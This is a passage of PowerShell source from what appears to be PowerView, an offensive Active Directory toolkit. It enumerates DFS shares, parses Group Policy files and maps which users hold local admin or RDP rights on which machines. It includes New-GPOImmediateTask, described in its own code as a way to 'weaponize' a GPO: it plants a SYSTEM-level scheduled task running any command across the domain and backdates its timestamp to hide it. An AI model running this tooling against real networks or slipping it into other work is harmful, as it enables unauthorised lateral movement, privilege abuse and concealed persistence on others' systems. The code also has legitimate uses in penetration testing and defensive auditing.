$DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2')) try { $Results = $DFSSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { $Properties = $_.Properties $target_list = $Properties.'msdfs-targetlistv2'[0] $xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)]) $DFSshares += $xml.targets.ChildNodes | ForEach-Object { try { $Target = $_.InnerText if ( $Target.Contains('\') ) { $DFSroot = $Target.split("\")[3] $ShareName = $Properties.'msdfs-linkpathv2'[0] New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split("\")[2]} } } catch { Write-Verbose "Error in parsing target : $_" } } } $Results.dispose() $DFSSearcher.dispose() } catch { Write-Warning "Get-DFSshareV2 error : $_" } $DFSshares | Sort-Object -Unique -Property "RemoteServerName" } } $DFSshares = @() if ( ($Version -eq "all") -or ($Version.endsWith("1")) ) { $DFSshares += Get-DFSshareV1 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize } if ( ($Version -eq "all") -or ($Version.endsWith("2")) ) { $DFSshares += Get-DFSshareV2 -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize } $DFSshares | Sort-Object -Property ("RemoteServerName","Name") -Unique } ######################################################## # # GPO related functions. # ######################################################## filter Get-GptTmpl { <# .SYNOPSIS Helper to parse a GptTmpl.inf policy file path into a custom object. .PARAMETER GptTmplPath The GptTmpl.inf file path name to parse. .PARAMETER UsePSDrive Switch. Mount the target GptTmpl folder path as a temporary PSDrive. .EXAMPLE PS C:\> Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" Parse the default domain policy .inf for dev.testlab.local #> [CmdletBinding()] Param ( [Parameter(Mandatory=$True, ValueFromPipeline=$True)] [String] $GptTmplPath, [Switch] $UsePSDrive ) if($UsePSDrive) { # if we're PSDrives, create a temporary mount point $Parts = $GptTmplPath.split('\') $FolderPath = $Parts[0..($Parts.length-2)] -join '\' $FilePath = $Parts[-1] $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join '' Write-Verbose "Mounting path $GptTmplPath using a temp PSDrive at $RandDrive" try { $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop } catch { Write-Verbose "Error mounting path $GptTmplPath : $_" return $Null } # so we can cd/dir the new drive $TargetGptTmplPath = $RandDrive + ":\" + $FilePath } else { $TargetGptTmplPath = $GptTmplPath } Write-Verbose "GptTmplPath: $GptTmplPath" try { Write-Verbose "Parsing $TargetGptTmplPath" $TargetGptTmplPath | Get-IniContent -ErrorAction SilentlyContinue } catch { Write-Verbose "Error parsing $TargetGptTmplPath : $_" } if($UsePSDrive -and $RandDrive) { Write-Verbose "Removing temp PSDrive $RandDrive" Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force } } filter Get-GroupsXML { <# .SYNOPSIS Helper to parse a groups.xml file path into a custom object. .PARAMETER GroupsXMLpath The groups.xml file path name to parse. .PARAMETER UsePSDrive Switch. Mount the target groups.xml folder path as a temporary PSDrive. #> [CmdletBinding()] Param ( [Parameter(Mandatory=$True, ValueFromPipeline=$True)] [String] $GroupsXMLPath, [Switch] $UsePSDrive ) if($UsePSDrive) { # if we're PSDrives, create a temporary mount point $Parts = $GroupsXMLPath.split('\') $FolderPath = $Parts[0..($Parts.length-2)] -join '\' $FilePath = $Parts[-1] $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join '' Write-Verbose "Mounting path $GroupsXMLPath using a temp PSDrive at $RandDrive" try { $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop } catch { Write-Verbose "Error mounting path $GroupsXMLPath : $_" return $Null } # so we can cd/dir the new drive $TargetGroupsXMLPath = $RandDrive + ":\" + $FilePath } else { $TargetGroupsXMLPath = $GroupsXMLPath } try { [XML]$GroupsXMLcontent = Get-Content $TargetGroupsXMLPath -ErrorAction Stop # process all group properties in the XML $GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object { $Groupname = $_.Properties.groupName # extract the localgroup sid for memberof $GroupSID = $_.Properties.groupSid if(-not $GroupSID) { if($Groupname -match 'Administrators') { $GroupSID = 'S-1-5-32-544' } elseif($Groupname -match 'Remote Desktop') { $GroupSID = 'S-1-5-32-555' } elseif($Groupname -match 'Guests') { $GroupSID = 'S-1-5-32-546' } else { $GroupSID = Convert-NameToSid -ObjectName $Groupname | Select-Object -ExpandProperty SID } } # extract out members added to this group $Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object { if($_.sid) { $_.sid } else { $_.name } } if ($Members) { # extract out any/all filters...I hate you GPP if($_.filters) { $Filters = $_.filters.GetEnumerator() | ForEach-Object { New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name} } } else { $Filters = $Null } if($Members -isnot [System.Array]) { $Members = @($Members) } $GPOGroup = New-Object PSObject $GPOGroup | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath $GPOGroup | Add-Member Noteproperty 'Filters' $Filters $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Null $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Members $GPOGroup } } } catch { Write-Verbose "Error parsing $TargetGroupsXMLPath : $_" } if($UsePSDrive -and $RandDrive) { Write-Verbose "Removing temp PSDrive $RandDrive" Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force } } function Get-NetGPO { <# .SYNOPSIS Gets a list of all current GPOs in a domain. .PARAMETER GPOname The GPO name to query for, wildcards accepted. .PARAMETER DisplayName The GPO display name to query for, wildcards accepted. .PARAMETER ComputerName Return all GPO objects applied to a given computer (FQDN). .PARAMETER Domain The domain to query for GPOs, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local" .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetGPO -Domain testlab.local Returns the GPOs in the 'testlab.local' domain. #> [CmdletBinding()] Param ( [Parameter(ValueFromPipeline=$True)] [String] $GPOname = '*', [String] $DisplayName, [String] $ComputerName, [String] $Domain, [String] $DomainController, [String] $ADSpath, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize } process { if ($GPOSearcher) { if($ComputerName) { $GPONames = @() $Computers = Get-NetComputer -ComputerName $ComputerName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize if(!$Computers) { throw "Computer $ComputerName in domain '$Domain' not found! Try a fully qualified host name" } # get the given computer's OU $ComputerOUs = @() ForEach($Computer in $Computers) { # extract all OUs a computer is a part of $DN = $Computer.distinguishedname $ComputerOUs += $DN.split(",") | ForEach-Object { if($_.startswith("OU=")) { $DN.substring($DN.indexof($_)) } } } Write-Verbose "ComputerOUs: $ComputerOUs" # find all the GPOs linked to the computer's OU ForEach($ComputerOU in $ComputerOUs) { $GPONames += Get-NetOU -Domain $Domain -DomainController $DomainController -ADSpath $ComputerOU -FullData -PageSize $PageSize | ForEach-Object { # get any GPO links write-verbose "blah: $($_.name)" $_.gplink.split("][") | ForEach-Object { if ($_.startswith("LDAP")) { $_.split(";")[0] } } } } Write-Verbose "GPONames: $GPONames" # find any GPOs linked to the site for the given computer $ComputerSite = (Get-SiteName -ComputerName $ComputerName).SiteName if($ComputerSite -and ($ComputerSite -notlike 'Error*')) { $GPONames += Get-NetSite -SiteName $ComputerSite -FullData | ForEach-Object { if($_.gplink) { $_.gplink.split("][") | ForEach-Object { if ($_.startswith("LDAP")) { $_.split(";")[0] } } } } } $GPONames | Where-Object{$_ -and ($_ -ne '')} | ForEach-Object { # use the gplink as an ADS path to enumerate all GPOs for the computer $GPOSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_ -PageSize $PageSize $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(name=$GPOname))" try { $Results = $GPOSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { $Out = Convert-LDAPProperty -Properties $_.Properties $Out | Add-Member Noteproperty 'ComputerName' $ComputerName $Out } $Results.dispose() $GPOSearcher.dispose() } catch { Write-Warning $_ } } } else { if($DisplayName) { $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(displayname=$DisplayName))" } else { $GPOSearcher.filter="(&(objectCategory=groupPolicyContainer)(name=$GPOname))" } try { $Results = $GPOSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { if($ADSPath -and ($ADSpath -Match '^GC://')) { $Properties = Convert-LDAPProperty -Properties $_.Properties try { $GPODN = $Properties.distinguishedname $GPODomain = $GPODN.subString($GPODN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.' $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($Properties.cn)" $Properties | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath $Properties } catch { $Properties } } else { # convert/process the LDAP fields for each result Convert-LDAPProperty -Properties $_.Properties } } $Results.dispose() $GPOSearcher.dispose() } catch { Write-Warning $_ } } } } } function New-GPOImmediateTask { <# .SYNOPSIS Builds an 'Immediate' schtask to push out through a specified GPO. .PARAMETER TaskName Name for the schtask to recreate. Required. .PARAMETER Command The command to execute with the task, defaults to 'powershell' .PARAMETER CommandArguments The arguments to supply to the -Command being launched. .PARAMETER TaskDescription An optional description for the task. .PARAMETER TaskAuthor The displayed author of the task, defaults to ''NT AUTHORITY\System' .PARAMETER TaskModifiedDate The displayed modified date for the task, defaults to 30 days ago. .PARAMETER GPOname The GPO name to build the task for. .PARAMETER GPODisplayName The GPO display name to build the task for. .PARAMETER Domain The domain to query for the GPOs, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local" .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target. .EXAMPLE PS> New-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-c "123 | Out-File C:\Temp\debug.txt"' -Force Create an immediate schtask that executes the specified PowerShell arguments and push it out to the 'SecurePolicy' GPO, skipping the confirmation prompt. .EXAMPLE PS> New-GPOImmediateTask -GPODisplayName SecurePolicy -Remove -Force Remove all schtasks from the 'SecurePolicy' GPO, skipping the confirmation prompt. #> [CmdletBinding(DefaultParameterSetName = 'Create')] Param ( [Parameter(ParameterSetName = 'Create', Mandatory = $True)] [String] [ValidateNotNullOrEmpty()] $TaskName, [Parameter(ParameterSetName = 'Create')] [String] [ValidateNotNullOrEmpty()] $Command = 'powershell', [Parameter(ParameterSetName = 'Create')] [String] [ValidateNotNullOrEmpty()] $CommandArguments, [Parameter(ParameterSetName = 'Create')] [String] [ValidateNotNullOrEmpty()] $TaskDescription = '', [Parameter(ParameterSetName = 'Create')] [String] [ValidateNotNullOrEmpty()] $TaskAuthor = 'NT AUTHORITY\System', [Parameter(ParameterSetName = 'Create')] [String] [ValidateNotNullOrEmpty()] $TaskModifiedDate = (Get-Date (Get-Date).AddDays(-30) -Format u).trim("Z"), [Parameter(ParameterSetName = 'Create')] [Parameter(ParameterSetName = 'Remove')] [String] $GPOname, [Parameter(ParameterSetName = 'Create')] [Parameter(ParameterSetName = 'Remove')] [String] $GPODisplayName, [Parameter(ParameterSetName = 'Create')] [Parameter(ParameterSetName = 'Remove')] [String] $Domain, [Parameter(ParameterSetName = 'Create')] [Parameter(ParameterSetName = 'Remove')] [String] $DomainController, [Parameter(ParameterSetName = 'Create')] [Parameter(ParameterSetName = 'Remove')] [String] $ADSpath, [Parameter(ParameterSetName = 'Create')] [Parameter(ParameterSetName = 'Remove')] [Switch] $Force, [Parameter(ParameterSetName = 'Remove')] [Switch] $Remove, [Parameter(ParameterSetName = 'Create')] [Parameter(ParameterSetName = 'Remove')] [Management.Automation.PSCredential] $Credential ) # build the XML spec for our 'immediate' scheduled task $TaskXML = ''+$TaskAuthor+''+$TaskDescription+'NT AUTHORITY\SystemHighestAvailableS4UPT10MPT1HtruefalseIgnoreNewfalsetruefalsetruefalsetruetruePT0S7PT0SPT15M3'+$Command+''+$CommandArguments+'%LocalTimeXmlEx%%LocalTimeXmlEx%true' if (!$PSBoundParameters['GPOname'] -and !$PSBoundParameters['GPODisplayName']) { Write-Warning 'Either -GPOName or -GPODisplayName must be specified' return } # eunmerate the specified GPO(s) $GPOs = Get-NetGPO -GPOname $GPOname -DisplayName $GPODisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -Credential $Credential if(!$GPOs) { Write-Warning 'No GPO found.' return } $GPOs | ForEach-Object { $ProcessedGPOName = $_.Name try { Write-Verbose "Trying to weaponize GPO: $ProcessedGPOName" # map a network drive as New-PSDrive/New-Item/etc. don't accept -Credential properly :( if($Credential) { Write-Verbose "Mapping '$($_.gpcfilesyspath)' to network drive N:\" $Path = $_.gpcfilesyspath.TrimEnd('\') $Net = New-Object -ComObject WScript.Network $Net.MapNetworkDrive("N:", $Path, $False, $Credential.UserName, $Credential.GetNetworkCredential().Password) $TaskPath = "N:\Machine\Preferences\ScheduledTasks\" } else { $TaskPath = $_.gpcfilesyspath + "\Machine\Preferences\ScheduledTasks\" } if($Remove) { if(!(Test-Path "$TaskPath\ScheduledTasks.xml")) { Throw "Scheduled task doesn't exist at $TaskPath\ScheduledTasks.xml" } if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Removing schtask at $TaskPath\ScheduledTasks.xml")) { return } Remove-Item -Path "$TaskPath\ScheduledTasks.xml" -Force } else { if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Creating schtask at $TaskPath\ScheduledTasks.xml")) { return } # create the folder if it doesn't exist $Null = New-Item -ItemType Directory -Force -Path $TaskPath if(Test-Path "$TaskPath\ScheduledTasks.xml") { Throw "Scheduled task already exists at $TaskPath\ScheduledTasks.xml !" } $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTasks.xml" } if($Credential) { Write-Verbose "Removing mounted drive at N:\" $Net = New-Object -ComObject WScript.Network $Net.RemoveNetworkDrive("N:") } } catch { Write-Warning "Error for GPO $ProcessedGPOName : $_" if($Credential) { Write-Verbose "Removing mounted drive at N:\" $Net = New-Object -ComObject WScript.Network $Net.RemoveNetworkDrive("N:") } } } } function Get-NetGPOGroup { <# .SYNOPSIS Returns all GPOs in a domain that set "Restricted Groups" or use groups.xml on on target machines. Author: @harmj0y License: BSD 3-Clause Required Dependencies: Get-NetGPO, Get-GptTmpl, Get-GroupsXML, Convert-NameToSid, Convert-SidToName Optional Dependencies: None .DESCRIPTION First enumerates all GPOs in the current/target domain using Get-NetGPO with passed arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or group membership is set through Group Policy Preferences groups.xml files. For any GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership' section data is processed if present. Any found Groups.xml files are parsed with Get-GroupsXML and those memberships are returned as well. .PARAMETER GPOname The GPO name (GUID) to query for, wildcards accepted. .PARAMETER DisplayName The GPO display name to query for, wildcards accepted. .PARAMETER Domain The domain to query for GPOs, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through for GPOs. e.g. "LDAP://cn={8FF59D28-15D7-422A-BCB7-2AE45724125A},cn=policies,cn=system,DC=dev,DC=testlab,DC=local" .PARAMETER ResolveMemberSIDs Switch. Try to resolve the SIDs of all found group members. .PARAMETER UsePSDrive Switch. Mount any found policy files with temporary PSDrives. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .EXAMPLE PS C:\> Get-NetGPOGroup Returns all local groups set by GPO along with their members and memberof. .EXAMPLE PS C:\> Get-NetGPOGroup -ResolveMemberSIDs Returns all local groups set by GPO along with their members and memberof, and resolve any members to their domain SIDs. .EXAMPLE PS C:\> Get-NetGPOGroup -GPOName '{0847C615-6C4E-4D45-A064-6001040CC21C}' Return any GPO-set groups for the GPO with the given name/GUID. .EXAMPLE PS C:\> Get-NetGPOGroup -DisplayName 'Desktops' Return any GPO-set groups for the GPO with the given display name. .LINK https://morgansimonsenblog.azurewebsites.net/tag/groups/ #> [CmdletBinding()] Param ( [String] $GPOname = '*', [String] $DisplayName, [String] $Domain, [String] $DomainController, [String] $ADSpath, [Switch] $ResolveMemberSIDs, [Switch] $UsePSDrive, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) $Option = [System.StringSplitOptions]::RemoveEmptyEntries # get every GPO from the specified domain with restricted groups set Get-NetGPO -GPOName $GPOname -DisplayName $DisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -PageSize $PageSize | ForEach-Object { $GPOdisplayName = $_.displayname $GPOname = $_.name $GPOPath = $_.gpcfilesyspath $ParseArgs = @{ 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" 'UsePSDrive' = $UsePSDrive } # parse the GptTmpl.inf 'Restricted Groups' file if it exists $Inf = Get-GptTmpl @ParseArgs if($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) { $Memberships = @{} # group the members/memberof fields for each entry ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) { $Group, $Relation = $Membership.Key.Split('__', $Option) | ForEach-Object {$_.Trim()} # extract out ALL members $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_} if($ResolveMemberSIDs) { # if the resulting member is username and not a SID, attempt to resolve it $GroupMembers = @() ForEach($Member in $MembershipValue) { if($Member -and ($Member.Trim() -ne '')) { if($Member -notmatch '^S-1-.*') { $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID if($MemberSID) { $GroupMembers += $MemberSID } else { $GroupMembers += $Member } } else { $GroupMembers += $Member } } } $MembershipValue = $GroupMembers } if(-not $Memberships[$Group]) { $Memberships[$Group] = @{} } if($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)} $Memberships[$Group].Add($Relation, $MembershipValue) } ForEach ($Membership in $Memberships.GetEnumerator()) { if($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) { # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name $GroupSID = $Membership.Key.Trim('*') if($GroupSID -and ($GroupSID.Trim() -ne '')) { $GroupName = Convert-SidToName -SID $GroupSID } else { $GroupName = $False } } else { $GroupName = $Membership.Key if($GroupName -and ($GroupName.Trim() -ne '')) { if($Groupname -match 'Administrators') { $GroupSID = 'S-1-5-32-544' } elseif($Groupname -match 'Remote Desktop') { $GroupSID = 'S-1-5-32-555' } elseif($Groupname -match 'Guests') { $GroupSID = 'S-1-5-32-546' } elseif($GroupName.Trim() -ne '') { $GroupSID = Convert-NameToSid -Domain $Domain -ObjectName $Groupname | Select-Object -ExpandProperty SID } else { $GroupSID = $Null } } } $GPOGroup = New-Object PSObject $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups' $GPOGroup | Add-Member Noteproperty 'Filters' $Null $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members $GPOGroup } } $ParseArgs = @{ 'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml" 'UsePSDrive' = $UsePSDrive } Get-GroupsXML @ParseArgs | ForEach-Object { if($ResolveMemberSIDs) { $GroupMembers = @() ForEach($Member in $_.GroupMembers) { if($Member -and ($Member.Trim() -ne '')) { if($Member -notmatch '^S-1-.*') { # if the resulting member is username and not a SID, attempt to resolve it $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID if($MemberSID) { $GroupMembers += $MemberSID } else { $GroupMembers += $Member } } else { $GroupMembers += $Member } } } $_.GroupMembers = $GroupMembers } $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName $_ | Add-Member Noteproperty 'GPOName' $GPOName $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences' $_ } } } function Find-GPOLocation { <# .SYNOPSIS Enumerates the machines where a specific user/group is a member of a specific local group, all through GPO correlation. Author: @harmj0y License: BSD 3-Clause Required Dependencies: Get-NetUser, Get-NetGroup, Get-NetGPOGroup, Get-NetOU, Get-NetComputer, Get-ADObject, Get-NetSite Optional Dependencies: None .DESCRIPTION Takes a user/group name and optional domain, and determines the computers in the domain the user/group has local admin (or RDP) rights to. It does this by: 1. resolving the user/group to its proper SID 2. enumerating all groups the user/group is a current part of and extracting all target SIDs to build a target SID list 3. pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling Get-NetGPOGroup 4. matching the target SID list to the queried GPO SID list to enumerate all GPO the user is effectively applied with 5. enumerating all OUs and sites and applicable GPO GUIs are applied to through gplink enumerating 6. querying for all computers under the given OUs or sites If no user/group is specified, all user/group -> machine mappings discovered through GPO relationships are returned. .PARAMETER UserName A (single) user name name to query for access. .PARAMETER GroupName A (single) group name name to query for access. .PARAMETER Domain Optional domain the user exists in for querying, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER LocalGroup The local group to check access against. Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555), or a custom local SID. Defaults to local 'Administrators'. .PARAMETER UsePSDrive Switch. Mount any found policy files with temporary PSDrives. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .EXAMPLE PS C:\> Find-GPOLocation Find all user/group -> machine relationships where the user/group is a member of the local administrators group on target machines. .EXAMPLE PS C:\> Find-GPOLocation -UserName dfm Find all computers that dfm user has local administrator rights to in the current domain. .EXAMPLE PS C:\> Find-GPOLocation -UserName dfm -Domain dev.testlab.local Find all computers that dfm user has local administrator rights to in the dev.testlab.local domain. .EXAMPLE PS C:\> Find-GPOLocation -UserName jason -LocalGroup RDP Find all computers that jason has local RDP access rights to in the domain. #> [CmdletBinding()] Param ( [String] $UserName, [String] $GroupName, [String] $Domain, [String] $DomainController, [String] $LocalGroup = 'Administrators', [Switch] $UsePSDrive, [ValidateRange(1,10000)] [Int] $PageSize = 200 ) if($UserName) { # if a group name is specified, get that user object so we can extract the target SID $User = Get-NetUser -UserName $UserName -Domain $Domain -DomainController $DomainController -PageSize $PageSize | Select-Object -First 1 $UserSid = $User.objectsid if(-not $UserSid) { Throw "User '$UserName' not found!" } $TargetSIDs = @($UserSid) $ObjectSamAccountName = $User.samaccountname $TargetObject = $UserSid } elseif($GroupName) { # if a group name is specified, get that group object so we can extract the target SID $Group = Get-NetGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Select-Object -First 1 $GroupSid = $Group.objectsid if(-not $GroupSid) { Throw "Group '$GroupName' not found!" } $TargetSIDs = @($GroupSid) $ObjectSamAccountName = $Group.samaccountname $TargetObject = $GroupSid } else { $TargetSIDs = @('*') } # figure out what the SID is of the target local group we're checking for membership in if($LocalGroup -like "*Admin*") { $TargetLocalSID = 'S-1-5-32-544' } elseif ( ($LocalGroup -like "*RDP*") -or ($LocalGroup -like "*Remote*") ) { $TargetLocalSID = 'S-1-5-32-555' } elseif ($LocalGroup -like "S-1-5-*") { $TargetLocalSID = $LocalGroup } else { throw "LocalGroup must be 'Administrators', 'RDP', or a 'S-1-5-X' SID format." } # if we're not listing all relationships, use the tokenGroups approach from Get-NetGroup to # get all effective security SIDs this object is a part of if($TargetSIDs[0] -and ($TargetSIDs[0] -ne '*')) { $TargetSIDs += Get-NetGroup -Domain $Domain -DomainController $DomainController -PageSize $PageSize -UserName $ObjectSamAccountName -RawSids } if(-not $TargetSIDs) { throw "No effective target SIDs!" } Write-Verbose "TargetLocalSID: $TargetLocalSID" Write-Verbose "Effective target SIDs: $TargetSIDs" $GPOGroupArgs = @{ 'Domain' = $Domain 'DomainController' = $DomainController 'UsePSDrive' = $UsePSDrive 'ResolveMemberSIDs' = $True 'PageSize' = $PageSize } # enumerate all GPO group mappings for the target domain that involve our target SID set $GPOgroups = Get-NetGPOGroup @GPOGroupArgs | ForEach-Object { $GPOgroup = $_ # if the locally set group is what we're looking for, check the GroupMembers ('members') # for our target SID if($GPOgroup.GroupSID -match $TargetLocalSID) { $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object { if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) { $GPOgroup } } } # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs if( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) { if( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) { $GPOgroup } } } | Sort-Object -Property GPOName -Unique $GPOgroups | ForEach-Object { $GPOname = $_.GPODisplayName $GPOguid = $_.GPOName $GPOPath = $_.GPOPath $GPOType = $_.GPOType if($_.GroupMembers) { $GPOMembers = $_.GroupMembers } else { $GPOMembers = $_.GroupSID } $Filters = $_.Filters if(-not $TargetObject) { # if the * wildcard was used, set the ObjectDistName as the GPO member SID set # so all relationship mappings are output $TargetObjectSIDs = $GPOMembers } else { $TargetObjectSIDs = $TargetObject } # find any OUs that have this GUID applied and then retrieve any computers from the OU Get-NetOU -Domain $Domain -DomainController $DomainController -GUID $GPOguid -FullData -PageSize $PageSize | ForEach-Object { if($Filters) { # filter for computer name/org unit if a filter is specified # TODO: handle other filters (i.e. OU filters?) again, I hate you GPP... $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -FullData -PageSize $PageSize | Where-Object { $_.adspath -match ($Filters.Value) } | ForEach-Object { $_.dnshostname } } else { $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -PageSize $PageSize } if($OUComputers) { if($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)} ForEach ($TargetSid in $TargetObjectSIDs) { $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype $GPOLocation = New-Object PSObject $GPOLocation | Add-Member Noteproperty 'ObjectName' $Object.samaccountname $GPOLocation | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname $GPOLocation | Add-Member Noteproperty 'ObjectSID' $Object.objectsid $GPOLocation | Add-Member Noteproperty 'Domain' $Domain $GPOLocation | Add-Member Noteproperty 'IsGroup' $IsGroup $GPOLocation | Add-Member Noteproperty 'GPODisplayName' $GPOname $GPOLocation | Add-Member Noteproperty 'GPOGuid' $GPOGuid $GPOLocation | Add-Member Noteproperty 'GPOPath' $GPOPath $GPOLocation | Add-Member Noteproperty 'GPOType' $GPOType $GPOLocation | Add-Member Noteproperty 'ContainerName' $_.distinguishedname $GPOLocation | Add-Member Noteproperty 'ComputerName' $OUComputers $GPOLocation.PSObject.TypeNames.Add('PowerView.GPOLocalGroup') $GPOLocation } } } # find any sites that have this GUID applied Get-NetSite -Domain $Domain -DomainController $DomainController -GUID $GPOguid -PageSize $PageSize -FullData | ForEach-Object { ForEach ($TargetSid in $TargetObjectSIDs) { $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype $AppliedSite = New-Object PSObject $AppliedSite | Add-Member Noteproperty 'ObjectName' $Object.samaccountname $AppliedSite | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname $AppliedSite | Add-Member Noteproperty 'ObjectSID' $Object.objectsid $AppliedSite | Add-Member Noteproperty 'IsGroup' $IsGroup $AppliedSite | Add-Member Noteproperty 'Domain' $Domain $AppliedSite | Add-Member Noteproperty 'GPODisplayName' $GPOname $AppliedSite | Add-Member Noteproperty 'GPOGuid' $GPOGuid $AppliedSite | Add-Member Noteproperty 'GPOPath' $GPOPath $AppliedSite | Add-Member Noteproperty 'GPOType' $GPOType $AppliedSite | Add-Member Noteproperty 'ContainerName' $_.distinguishedname $AppliedSite | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl $AppliedSite.PSObject.TypeNames.Add('PowerView.GPOLocalGroup') $AppliedSite } } } } function Find-GPOComputerAdmin { <# .SYNOPSIS Takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine. Author: @harmj0y License: BSD 3-Clause Required Dependencies: 